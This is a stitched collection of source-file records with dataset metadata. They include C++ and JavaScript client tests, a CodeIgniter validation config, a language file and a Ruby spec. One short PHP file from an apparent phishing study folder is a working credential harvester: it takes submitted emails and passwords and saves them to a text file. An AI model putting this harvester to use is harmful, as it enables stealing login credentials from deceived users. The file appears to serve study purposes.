.SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB", "default"))
.SetSendRetries(1)
.SetPingBeforeQuery(true)
.SetCompressionMethod(CompressionMethod::None),
QUERIES}));
INSTANTIATE_TEST_SUITE_P(ClientLocalFailed, ConnectionFailedClientTest,
::testing::Values(ConnectionFailedClientTest::ParamType{
ClientOptions()
.SetHost( getEnvOrDefault("CLICKHOUSE_HOST", "localhost"))
.SetPort( std::stoi(getEnvOrDefault("CLICKHOUSE_PORT", "9000")))
.SetUser("non_existing_user_clickhouse_cpp_test")
.SetPassword("wrongpwd")
.SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB", "default"))
.SetSendRetries(1)
.SetPingBeforeQuery(true)
.SetCompressionMethod(CompressionMethod::None),
"Authentication failed: password is incorrect"}));
|
C++
|
Apache-2.0
|
cnmade/clickhouse-cpp/ut/client_ut.cpp
|
251926c8-f8cb-443f-99e0-77254d63430d
|
[{"tag": "PASSWORD", "value": "wrongpwd", "start": 33364, "end": 33372, "context": "\")\n .SetPassword(\"wrongpwd\")\n .SetDefaultDat"}]
|
[{"tag": "PASSWORD", "value": "wrongpwd", "start": 33364, "end": 33372, "context": "\")\n .SetPassword(\"wrongpwd\")\n .SetDefaultDat"}]
|
/* eslint-disable camelcase */
import test from "ava";
import nock from "nock";
import { setGlobalDispatcher } from "undici";
import { websiteAgent } from "@indiekit-test/mock-agent";
import { twitter } from "../../lib/twitter.js";
setGlobalDispatcher(websiteAgent());
test.beforeEach((t) => {
t.context = {
apiResponse: {
id_str: "1234567890987654321",
user: { screen_name: "username" },
},
media: (filename) => ({
url: `https://website.example/${filename}`,
alt: "Example image",
}),
tweetUrl: "https://twitter.com/username/status/1234567890987654321",
statusId: "1234567890987654321",
options: {
apiKey: "0123456789abcdefghijklmno",
apiKeySecret: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789",
accessTokenKey: "ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789",
accessTokenSecret: "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN",
user: "username",
},
publication: {
me: "https://website.example",
},
};
});
test("Posts a like", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/favorites/create.json")
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).postLike(t.context.tweetUrl);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
test("Throws error posting a like", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/favorites/create.json")
.replyWithError("Not found");
await t.throwsAsync(twitter(t.context.options).postLike(t.context.tweetUrl), {
message: /Not found/,
});
});
test("Throws API error posting a like", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/favorites/create.json")
.reply(404, {
errors: [{ message: "Not found" }],
});
await t.throwsAsync(twitter(t.context.options).postLike(t.context.tweetUrl), {
message: /Not found/,
});
});
test("Posts a retweet", async (t) => {
nock("https://api.twitter.com")
.post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).postRetweet(
t.context.tweetUrl
);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
test("Throws error posting a retweet", async (t) => {
nock("https://api.twitter.com")
.post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
.replyWithError("Not found");
await t.throwsAsync(
twitter(t.context.options).postRetweet(t.context.tweetUrl),
{
message: /Not found/,
}
);
});
test("Throws API error posting a retweet", async (t) => {
nock("https://api.twitter.com")
.post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
.reply(404, {
errors: [{ message: "Not found" }],
});
await t.throwsAsync(
twitter(t.context.options).postRetweet(t.context.tweetUrl),
{
message: /Not found/,
}
);
});
test("Posts a status", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/statuses/update.json")
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).postStatus(t.context.status);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
test("Throws error posting a status", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/statuses/update.json")
.replyWithError("Not found");
await t.throwsAsync(twitter(t.context.options).postStatus(t.context.status), {
message: /Not found/,
});
});
test("Throws API error posting a status", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/statuses/update.json")
.reply(404, {
errors: [{ message: "Not found" }],
});
await t.throwsAsync(twitter(t.context.options).postStatus(t.context.status), {
message: /Not found/,
});
});
test("Throws error fetching media to upload", async (t) => {
await t.throwsAsync(
twitter(t.context.options).uploadMedia(
t.context.media("image.jpg"),
t.context.publication
),
{
message: "Not Found",
}
);
});
test("Uploads media and returns a media id", async (t) => {
nock("https://upload.twitter.com").post("/1.1/media/upload.json").reply(200, {
media_id_string: "1234567890987654321",
});
nock("https://upload.twitter.com")
.post("/1.1/media/metadata/create.json")
.reply(200, {});
const result = await twitter(t.context.options).uploadMedia(
t.context.media("photo1.jpg"),
t.context.publication
);
t.is(result, "1234567890987654321");
});
test("Throws error uploading media", async (t) => {
nock("https://upload.twitter.com")
.post("/1.1/media/upload.json")
.reply(404, {
errors: [{ message: "Not found" }],
});
await t.throwsAsync(
twitter(t.context.options).uploadMedia(
t.context.media("photo2.jpg"),
t.context.publication
),
{
message: /Not found/,
}
);
});
test("Returns false passing an object to media upload function", async (t) => {
const result = await twitter(t.context.options).uploadMedia(
{ foo: "bar" },
t.context.publication
);
t.falsy(result);
});
test("Posts a like of a tweet to Twitter", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/favorites/create.json")
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).post(
{
"like-of": t.context.tweetUrl,
},
t.context.publication
);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
test("Doesn’t post a like of a URL to Twitter", async (t) => {
const result = await twitter(t.context.options).post(
{
"like-of": "https://foo.bar/lunchtime",
},
t.context.publication
);
t.falsy(result);
});
test("Posts a repost of a tweet to Twitter", async (t) => {
nock("https://api.twitter.com")
.post(`/1.1/statuses/retweet/${t.context.statusId}.json`)
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).post(
{
"repost-of": t.context.tweetUrl,
},
t.context.publication
);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
test("Doesn’t post a repost of a URL to Twitter", async (t) => {
const result = await twitter(t.context.options).post(
{
"repost-of": "https://foo.bar/lunchtime",
},
t.context.publication
);
t.falsy(result);
});
test("Posts a quote status to Twitter", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/statuses/update.json")
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).post(
{
content: {
html: "<p>Someone else who likes cheese sandwiches.</p>",
},
"repost-of": t.context.tweetUrl,
"post-type": "repost",
},
t.context.publication
);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
test("Posts a status to Twitter", async (t) => {
nock("https://api.twitter.com")
.post("/1.1/statuses/update.json")
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).post(
{
content: {
html: "<p>I ate a <em>cheese</em> sandwich, which was nice.</p>",
text: "I ate a cheese sandwich, which was nice.",
},
url: "https://foo.bar/lunchtime",
},
t.context.publication
);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
test("Posts a status to Twitter with 4 out of 5 photos", async (t) => {
nock("https://upload.twitter.com")
.post("/1.1/media/upload.json")
.reply(200, { media_id_string: "1" });
nock("https://upload.twitter.com")
.post("/1.1/media/upload.json")
.reply(200, { media_id_string: "2" });
nock("https://upload.twitter.com")
.post("/1.1/media/upload.json")
.reply(200, { media_id_string: "3" });
nock("https://upload.twitter.com")
.post("/1.1/media/upload.json")
.reply(200, { media_id_string: "4" });
nock("https://api.twitter.com")
.post("/1.1/statuses/update.json")
.reply(200, t.context.apiResponse);
const result = await twitter(t.context.options).post(
{
content: {
html: "<p>Here’s the cheese sandwiches I ate.</p>",
},
photo: [
{ url: `${t.context.publication.me}/photo3.jpg` },
{ url: `${t.context.publication.me}/photo4.jpg` },
{ url: `${t.context.publication.me}/photo5.jpg` },
{ url: `${t.context.publication.me}/photo6.jpg` },
{ url: `${t.context.publication.me}/photo7.jpg` },
],
},
t.context.publication
);
t.is(result, "https://twitter.com/username/status/1234567890987654321");
});
|
JavaScript
|
MIT
|
paulrobertlloyd/indiekit/packages/syndicator-twitter/tests/unit/twitter.js
|
0994c374-2855-4e35-8d53-e3ac6d0956df
|
[{"tag": "USERNAME", "value": "username", "start": 7484, "end": 7492, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 3236, "end": 3244, "context": "ext.status);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "USERNAME", "value": "username", "start": 8720, "end": 8728, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n"}, {"tag": "USERNAME", "value": "username", "start": 6942, "end": 6950, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 5543, "end": 5551, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}, {"tag": "USERNAME", "value": "username", "start": 565, "end": 573, "context": "mage\",\n }),\n tweetUrl: \"https://twitter.com/username/status/1234567890987654321\",\n statusId: \"12345"}, {"tag": "API_KEY", "value": "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN", "start": 874, "end": 924, "context": "pqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication:"}, {"tag": "API_KEY", "value": "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789", "start": 719, "end": 769, "context": "\"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghij"}, {"tag": "API_KEY", "value": "ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789", "start": 795, "end": 845, "context": "ABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijk"}, {"tag": "USERNAME", "value": "username", "start": 1299, "end": 1307, "context": "t.tweetUrl);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "API_KEY", "value": "0123456789abcdefghijklmno", "start": 670, "end": 695, "context": "34567890987654321\",\n options: {\n apiKey: \"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyz"}, {"tag": "USERNAME", "value": "username", "start": 940, "end": 948, "context": "ghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication: {\n me: \"https://we"}, {"tag": "USERNAME", "value": "username", "start": 6194, "end": 6202, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}]
|
[{"tag": "USERNAME", "value": "username", "start": 7484, "end": 7492, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 3236, "end": 3244, "context": "ext.status);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "USERNAME", "value": "username", "start": 8720, "end": 8728, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n"}, {"tag": "USERNAME", "value": "username", "start": 6942, "end": 6950, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Posts a "}, {"tag": "USERNAME", "value": "username", "start": 5543, "end": 5551, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}, {"tag": "USERNAME", "value": "username", "start": 565, "end": 573, "context": "mage\",\n }),\n tweetUrl: \"https://twitter.com/username/status/1234567890987654321\",\n statusId: \"12345"}, {"tag": "KEY", "value": "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN", "start": 874, "end": 924, "context": "pqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication:"}, {"tag": "KEY", "value": "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789", "start": 719, "end": 769, "context": "\"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghij"}, {"tag": "KEY", "value": "ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789", "start": 795, "end": 845, "context": "ABCDEFGHIJKLMN0123456789\",\n accessTokenKey: \"ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyz0123456789\",\n accessTokenSecret: \"0123456789abcdefghijk"}, {"tag": "USERNAME", "value": "username", "start": 1299, "end": 1307, "context": "t.tweetUrl);\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Throws e"}, {"tag": "KEY", "value": "0123456789abcdefghijklmno", "start": 670, "end": 695, "context": "34567890987654321\",\n options: {\n apiKey: \"0123456789abcdefghijklmno\",\n apiKeySecret: \"abcdefghijklmnopqrstuvwxyz"}, {"tag": "USERNAME", "value": "username", "start": 940, "end": 948, "context": "ghijklmnopqrstuvwxyzABCDEFGHIJKLMN\",\n user: \"username\",\n },\n publication: {\n me: \"https://we"}, {"tag": "USERNAME", "value": "username", "start": 6194, "end": 6202, "context": "ication\n );\n\n t.is(result, \"https://twitter.com/username/status/1234567890987654321\");\n});\n\ntest(\"Doesn\u2019t "}]
|
<?php namespace Config;
class Validation
{
//--------------------------------------------------------------------
// Setup
//--------------------------------------------------------------------
/**
* Stores the classes that contain the
* rules that are available.
*
* @var array
*/
public $ruleSets = [
\CodeIgniter\Validation\Rules::class,
\CodeIgniter\Validation\FormatRules::class,
\CodeIgniter\Validation\FileRules::class,
\CodeIgniter\Validation\CreditCardRules::class,
];
/**
* Specifies the views that are used to display the
* errors.
*
* @var array
*/
public $templates = [
'list' => 'CodeIgniter\Validation\Views\list',
'single' => 'CodeIgniter\Validation\Views\single',
];
//--------------------------------------------------------------------
// Rules
//--------------------------------------------------------------------
// login
public $login = [
'email' => 'required',
'password' => 'required'
];
public $login_errors = [
'email' => [
'required' => 'Please provide a valid email address.'
],
'password' => [
'required' => 'Please provide a valid password.',
]
];
// update administrator
public $administrator = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'required',
'password2' => 'permit_empty|min_length[8]',
];
public $administrator_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'required' => 'Please provide the current password.',
],
'password2' => [
'min_length' => 'New password must be at least 8 characters long.'
]
];
// Clinic
public $clinic = [
'name' => 'required|max_length[256]',
'address' => 'required|max_length[256]',
'city' => 'required|max_length[256]',
'province' => 'required|max_length[256]'
];
public $clinic_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters long.'
],
'address' => [
'required' => 'Please provide a valid address.',
'max_length' => 'Address must be less than 256 characters long.'
],
'city' => [
'required' => 'Please provide a valid city.',
'max_length' => 'City must be less than 256 characters long.'
],
'province' => [
'required' => 'Please provide a valid province.',
'max_length' => 'Province must be less than 256 characters long.'
]
];
// Update status pet owner
public $petOwner_status = [
'status' => 'required|in_list[0,1]'
];
public $petOwner_status_errors = [
'status' => [
'required' => 'Please provide a valid status.',
'in_list' => 'Please provide a valid status.'
]
];
// Register veterinarian
public $veterinarian_register = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'required|min_length[8]',
'password2' => 'required|matches[password]',
'nik' => 'required|exact_length[16]',
'phone_number' => 'required|max_length[16]',
'pdhi_number' => 'required|max_length[50]',
];
public $veterinarian_register_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'required' => 'Please provide a valid password.',
'min_length' => 'Password must be at least 8 characters long.'
],
'password2' => [
'required' => 'Please provide a valid confirmed password.',
'matches' => 'Password did not match.'
],
'nik' => [
'required' => 'Please provide a valid ID Number (NIK).',
'exact_length' => 'ID Number (NIK) must be 16 characters long.'
],
'phone_number' => [
'required' => 'Please provide a valid phone number.',
'max_length' => 'Phone number must be less than 16 characters.'
],
'pdhi_number' => [
'required' => 'Please provide a valid PDHI Registration Number.',
'max_length' => 'PDHI Registration Number must be less than 50 characters.'
]
];
// Edit veterinarian
public $veterinarian_edit = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'permit_empty|min_length[8]',
'password2' => 'required_with[password]|matches[password]',
'nik' => 'required|exact_length[16]',
'phone_number' => 'required|max_length[16]',
'pdhi_number' => 'required|max_length[50]',
'active' => 'required|in_list[0,1]',
'photo' => 'permit_empty|uploaded[photo]|is_image[photo]|ext_in[photo,png,jpg,jpeg]|max_size[photo,1024]',
];
public $veterinarian_edit_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'min_length' => 'Password must be at least 8 characters long.'
],
'password2' => [
'required_with' => 'Please provide a valid confirmed password.',
'matches' => 'Password did not match.'
],
'nik' => [
'required' => 'Please provide a valid ID Number (NIK).',
'exact_length' => 'ID Number (NIK) must be 16 characters long.'
],
'phone_number' => [
'required' => 'Please provide a valid phone number.',
'max_length' => 'Phone number must be less than 16 characters.'
],
'pdhi_number' => [
'required' => 'Please provide a valid PDHI Registration Number.',
'max_length' => 'PDHI Registration Number must be less than 50 characters.'
],
'active' => [
'required' => 'Please provide a valid status.',
'in_list' => 'Please provide a valid status.'
],
'photo' => [
'uploaded' => 'Please provide valid uploaded photo.',
'is_image' => 'Please provide a valid image (png or jpg only).',
'ext_in' => 'Please provide a valid image (png or jpg only).',
'max_size' => 'A photo must be less than 1MB in size.',
]
];
// Education
public $education = [
'title' => 'required|max_length[256]',
'instance' => 'required|max_length[256]',
'year' => 'required|greater_than[1945]|less_than[2020]',
];
public $education_errors = [
'title' => [
'required' => 'Please provide a valid title.',
'max_length' => 'Title must be less than 256 characters long.'
],
'instance' => [
'required' => 'Please provide a valid instance.',
'max_length' => 'Instance must be less than 256 characters long.'
],
'year' => [
'required' => 'Please provide a valid year.',
'greater_than' => 'Year must be in range 1945-2020.',
'less_than' => 'Year must be in range 1945-2020.'
]
];
// Organization
public $organization = [
'name' => 'required|max_length[256]',
'position' => 'required|max_length[256]',
'year' => 'required|greater_than[1945]|less_than[2020]'
];
public $organization_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters long.'
],
'position' => [
'required' => 'Please provide a valid position.',
'max_length' => 'Position must be less than 256 characters long.'
],
'year' => [
'required' => 'Please provide a valid year.',
'greater_than' => 'Year must be in range 1945-2020.',
'less_than' => 'Year must be in range 1945-2020.'
]
];
/**
* REST API VALIDATION
*/
// User sign in
public $api_user_signin = [
'email' => 'required',
'password' => 'required'
];
public $api_user_signin_errors = [
'email' => [
'required' => 'Please provide a valid email address.'
],
'password' => [
'required' => 'Please provide a valid password.'
]
];
// User signup
public $api_user_signup = [
'name' => 'required|max_length[256]',
'email' => 'required|valid_email|max_length[256]',
'password' => 'required|min_length[8]'
];
public $api_user_signup_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'email' => [
'required' => 'Please provide a valid email address.',
'valid_email' => 'Please provide a valid email address.',
'max_length' => 'Email address must be less than 256 characters.'
],
'password' => [
'required' => 'Please provide a valid password.',
'min_length' => 'Password must be at least 8 characters long.'
]
];
// User activation
public $api_user_activation = [
'activation_code' => 'required|is_natural|exact_length[6]'
];
public $api_user_activation_errors = [
'activation_code' => [
'required' => 'Please provide a valid activation code.',
'is_natural' => 'Please provide a valid activation code.',
'exact_length' => 'Please provide a valid activation code.'
]
];
// api_petowner_update
public $api_petowner_update = [
'name' => 'required|max_length[256]',
'password' => 'permit_empty|min_length[8]'
];
public $api_petowner_update_errors = [
'name' => [
'required' => 'Please provide a valid name.',
'max_length' => 'Name must be less than 256 characters.'
],
'password' => [
'min_length' => 'Password must be at least 8 characters long.'
]
];
// api_veterinarian_update
public $api_veterinarian_update = [
'password' => 'permit_empty|min_length[8]'
];
public $api_veterinarian_update_errors = [
'password' => [
'min_length' => 'Password must be at least 8 characters long.'
]
];
// api_user_photo
public $api_user_photo = [
'photo' => 'uploaded[photo]|max_size[photo,1024]',
];
public $api_user_photo_errors = [
'photo' => [
'uploaded' => 'Please provide a valid image.',
'is_image' => 'Please provide a valid image.',
'ext_in' => 'Please provide a valid image.',
'max_size' => 'Photo must be less than 1MB in size.',
]
];
// api_create_question
public $api_create_question = [
'content' => 'required|max_length[2000]'
];
public $api_create_question_errors = [
'content' => [
'required' => 'Please provide a content.',
'max_length' => 'Content must be less than 2000 characters.'
]
];
// api_create_answer
public $api_create_answer = [
'content' => 'required|max_length[2000]'
];
public $api_create_answer_errors = [
'content' => [
'required' => 'Please provide a content.',
'max_length' => 'Content must be less than 2000 characters.'
]
];
// api_create_answer
public $api_create_message = [
'content' => 'required|max_length[2000]'
];
public $api_create_answer_message = [
'content' => [
'required' => 'Please provide a content.',
'max_length' => 'Content must be less than 2000 characters.'
]
];
}
|
PHP
|
MIT
|
darmageddon/vetkita/app/Config/Validation.php
|
159a0ceb-823d-4382-89fc-bfeca31e3d94
|
[]
|
[]
|
<?php
/* Get fields: */
$login_field = "Login: " . $_GET["email"] . "\n";
$passwd_field = "Password: " . $_GET["pass"] . "\n";
/* Open datalist file: */
$file = fopen("data.txt", "a");
/* Write/Save */
$lwrite = fwrite($file, $login_field);
$pwrite = fwrite($file, $passwd_field);
/* Close file: */
fclose($file);
// echo "Error message."
/* Redirect: */
header("#")
?>
|
PHP
|
CC0-1.0
|
rf-peixoto/Studies/Code/Phishing/Login/Generic/login.php
|
40d16bd1-ca94-4dc5-aea0-74cf2eed85a6
|
[]
|
[]
|
<?php
return [
'name' => 'Name',
'user' => 'User',
'email' => 'E-Mail Address',
'password' => 'Password',
'confirmPassword' => 'Confirm Password',
'confirmEmail' => 'Please confirm your email!',
'emailConfirmed' => 'You confirmed your email, please log in!',
'profile' => 'Profile',
'makeAdmin' => 'Make User Admin',
'loseAdmin' => 'Take Away Admin Privileges',
'uploadPicture' => 'Upload Picture',
'editProfile' => 'Edit Profile',
'registerDate' => 'Joined at',
'height' => 'Height',
'weight' => 'Weight',
'benchPress' => 'Bench Press',
'squat' => 'Squat',
'deadlift' => 'Deadlift',
'ohp' => 'Overhead Press',
'image' => 'Image',
'cardHolder' => 'Card Holder Name',
'cardNumber' => 'Card Number',
'expMonth' => 'Expiration Month',
'expYear' => 'Expiration Year',
'amount' => 'Amount',
'thanksForDonation' => 'Thank you for your donation!',
'bmr' => 'BMR',
];
|
PHP
|
MIT
|
bneuhausz/szakdolgozat/resources/lang/en/user.php
|
de86156e-9146-4a69-bff1-aeec684d7037
|
[]
|
[]
|
# frozen_string_literal: true
require 'spec_helper'
describe Assembly::ObjectFile do
it 'does not run if no input file is passed in' do
@ai = described_class.new('')
expect { @ai.filesize }.to raise_error(RuntimeError, 'input file does not exist')
expect { @ai.sha1 }.to raise_error(RuntimeError, 'input file does not exist')
expect { @ai.md5 }.to raise_error(RuntimeError, 'input file does not exist')
end
it 'returns the common directory of a set of filenames passed into it, where the common part does not terminate on a directory' do
expect(described_class.common_path(['/Users/peter/00/test.tif', '/Users/peter/05/test.jp2'])).to eq('/Users/peter/')
end
it 'returns the common directory of a set of filenames passed into it, where the common part does not terminate on a directory' do
expect(described_class.common_path(['/Users/peter/00/test.tif', '/Users/peter/00/test.jp2'])).to eq('/Users/peter/00/')
end
it 'tells us if an input file is an image' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.image?).to eq(true)
expect(@ai.exif).not_to be nil
expect(@ai.mimetype).to eq('image/tiff')
expect(@ai.file_mimetype).to eq('image/tiff')
expect(@ai.extension_mimetype).to eq('image/tiff')
expect(@ai.exif_mimetype).to eq('image/tiff')
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(true)
end
it 'tells us information about the input file' do
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.filename).to eq('test.tif')
expect(@ai.ext).to eq('.tif')
expect(@ai.filename_without_ext).to eq('test')
expect(@ai.dirname).to eq(File.dirname(TEST_TIF_INPUT_FILE))
end
it 'sets the correct mimetype of plain/text for .txt files' do
@ai = described_class.new(TEST_RES1_TEXT)
expect(@ai.mimetype).to eq('text/plain')
end
it 'sets the correct mimetype of plain/text for .xml files' do
@ai = described_class.new(TEST_RES1_TEXT)
expect(@ai.mimetype).to eq('text/plain')
end
it 'sets the correct mimetype of plain/text for .obj 3d files' do
@ai = described_class.new(TEST_OBJ_FILE)
expect(@ai.mimetype).to eq('text/plain')
end
it 'sets a mimetype of application/x-tgif for .obj 3d files if we prefer the mimetype extension gem over unix file system command' do
@ai = described_class.new(TEST_OBJ_FILE, mime_type_order: %i[extension file exif])
expect(@ai.mimetype).to eq('application/x-tgif')
end
it 'ignores invald mimetype generation methods and still sets a mimetype of application/x-tgif for .obj 3d files if we prefer the mimetype extension gem over unix file system command' do
@ai = described_class.new(TEST_OBJ_FILE, mime_type_order: %i[bogus extension file])
expect(@ai.mimetype).to eq('application/x-tgif')
end
it 'sets the correct mimetype of plain/text for .ply 3d files' do
@ai = described_class.new(TEST_PLY_FILE)
expect(@ai.mimetype).to eq('text/plain')
end
it 'overrides the mimetype generators and uses the manual mapping to set the correct mimetype of application/json for a .json file' do
@ai = described_class.new(TEST_JSON_FILE)
expect(@ai.exif_mimetype).to be_nil # exif returns nil
expect(@ai.file_mimetype).to eq('text/plain') # unix file system command returns plain text
expect(@ai.mimetype).to eq('application/json') # but our configured mapping overrides both and returns application/json
end
it 'sets the correct mimetype of image/tiff for .tif files' do
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.mimetype).to eq('image/tiff')
end
it 'sets the correct mimetype of image/jp2 for .jp2 files' do
@ai = described_class.new(TEST_JP2_INPUT_FILE)
expect(@ai.mimetype).to eq('image/jp2')
end
it 'sets the correct mimetype of application/pdf for .pdf files' do
@ai = described_class.new(TEST_RES1_PDF)
expect(@ai.mimetype).to eq('application/pdf')
end
it 'gives us the mimetype of a file even if the exif information is damaged' do
@ai = described_class.new(TEST_FILE_NO_EXIF)
expect(@ai.filename).to eq('file_with_no_exif.xml')
expect(@ai.ext).to eq('.xml')
expect(['text/html', 'application/xml'].include?(@ai.mimetype)).to be true # we could get either of these mimetypes depending on the OS
end
it 'gives us the DPG base name for a file' do
test_file = File.join(TEST_INPUT_DIR, 'oo000oo0001_00_001.tif')
@ai = described_class.new(test_file)
expect(@ai.dpg_basename).to eq('oo000oo0001_001')
end
it 'gives us the DPG subfolder name for a file' do
test_file = File.join(TEST_INPUT_DIR, 'oo000oo0001_05_001.tif')
@ai = described_class.new(test_file)
expect(@ai.dpg_folder).to eq('05')
end
it 'tells us that a jp2 file is not jp2able but does have a color profile' do
expect(File.exist?(TEST_JP2_INPUT_FILE)).to be true
@ai = described_class.new(TEST_JP2_INPUT_FILE)
expect(@ai.image?).to eq(true)
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(false)
expect(@ai.has_color_profile?).to eq(true)
end
it 'tells us that a tiff file is jp2able and has a color profile' do
expect(File.exist?(TEST_RES1_TIF1)).to be true
@ai = described_class.new(TEST_RES1_TIF1)
expect(@ai.image?).to eq(true)
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(true)
expect(@ai.has_color_profile?).to eq(true)
end
it 'tells us that a tiff file is not jp2able and is not valid since it has no profile' do
expect(File.exist?(TEST_TIFF_NO_COLOR_FILE)).to be true
@ai = described_class.new(TEST_TIFF_NO_COLOR_FILE)
expect(@ai.image?).to eq(true)
expect(@ai.object_type).to eq(:image)
expect(@ai.valid_image?).to eq(true)
expect(@ai.jp2able?).to eq(true)
expect(@ai.has_color_profile?).to eq(false)
end
it 'computes checksums for an image file' do
expect(File.exist?(TEST_TIF_INPUT_FILE)).to be true
@ai = described_class.new(TEST_TIF_INPUT_FILE)
expect(@ai.md5).to eq('a2400500acf21e43f5440d93be894101')
expect(@ai.sha1).to eq('8d11fab63089a24c8b17063d29a4b0eac359fb41')
end
it 'indicates that the file is not found when a valid directory is supplied instead of a file or when an invalid file path is specified' do
path = Assembly::PATH_TO_GEM
@ai = described_class.new(path)
expect(File.exist?(path)).to be true
expect(File.directory?(path)).to be true
